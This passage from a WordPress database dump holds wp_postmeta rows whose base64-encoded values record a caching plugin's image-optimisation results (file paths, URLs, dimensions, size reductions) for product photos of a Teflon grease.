IjoxNDgzNTYyNzIyLCJpZCI6MTgwN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIVC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhULTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USFQtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjI3MjUsImlkIjoxODA3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhULTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USFQtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIVC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2MjcyNywiaWQiOjE4MDd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USFQtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIVC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhULTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyNzMwLCJpZCI6MTgwN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIVC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhULTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USFQtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjI3MzMsImlkIjoxODA3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USFQtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIVC0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhULTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyNzM1LCJpZCI6MTgwN30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhULTIyNXgzNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USFQtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIVC0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2MjczOCwiaWQiOjE4MDd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIVC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhULTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USFQtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjI3NDEsImlkIjoxODA3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USFQtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIVC00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhULTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyNzQ0LCJpZCI6MTgwN30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhULTkweDkwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhULTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIVC05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjIxNiwidGltZSI6MTQ4MzU2Mjc0NiwiaWQiOjE4MDd9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29152, 1806, 'wpfc_optimisation_reduction', '2924348'); 
INSERT INTO `wp_postmeta` VALUES (29153, 1806, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USEUtSkFSLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USEUtSkFSLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIRS1KQVIuanBnIiwicmVkdWN0aW9uIjoyOTI0MTk0LCJ0aW1lIjoxNDgzNTYyNzU4LCJpZCI6IjE4MDYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhFLUpBUi0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhFLUpBUi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhFLUpBUi0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2Mjc2MSwiaWQiOjE4MDZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USEUtSkFSLTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USEUtSkFSLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USEUtSkFSLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyNzY0LCJpZCI6MTgwNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIRS1KQVItNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIRS1KQVItNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIRS1KQVItNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjI3NjcsImlkIjoxODA2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhFLUpBUi0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIRS1KQVItMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhFLUpBUi0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyNzczLCJpZCI6MTgwNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIRS1KQVItMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIRS1KQVItMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIRS1KQVItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjI3NzYsImlkIjoxODA2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhFLUpBUi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhFLUpBUi0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhFLUpBUi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2Mjc3OCwiaWQiOjE4MDZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USEUtSkFSLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USEUtSkFSLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USEUtSkFSLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyNzgxLCJpZCI6MTgwNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIRS1KQVItNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIRS1KQVItNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIRS1KQVItNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjI3ODQsImlkIjoxODA2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USEUtSkFSLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USEUtSkFSLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USEUtSkFSLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyNzg2LCJpZCI6MTgwNn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhFLUpBUi0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhFLUpBUi0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhFLUpBUi0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2Mjc4OSwiaWQiOjE4MDZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIRS1KQVItMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIRS1KQVItMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIRS1KQVItMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjI3OTIsImlkIjoxODA2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USEUtSkFSLTQ1MHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USEUtSkFSLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USEUtSkFSLTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyNzk1LCJpZCI6MTgwNn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhFLUpBUi05MHg5MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIRS1KQVItOTB4OTAuanBnIiwid2lkdGgiOiI5MCIsImhlaWdodCI6IjkwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhFLUpBUi05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjE0MiwidGltZSI6MTQ4MzU2Mjc5NywiaWQiOjE4MDZ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29154, 1805, 'wpfc_optimisation_reduction', '3249291'); 
INSERT INTO `wp_postmeta` VALUES (29155, 1805, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USEUuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIRS5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USEUuanBnIiwicmVkdWN0aW9uIjozMjQ5MDc0LCJ0aW1lIjoxNDgzNTYyODEwLCJpZCI6IjE4MDUifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhFLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USEUtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIRS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2MjgxMiwiaWQiOjE4MDV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USEUtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIRS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90Y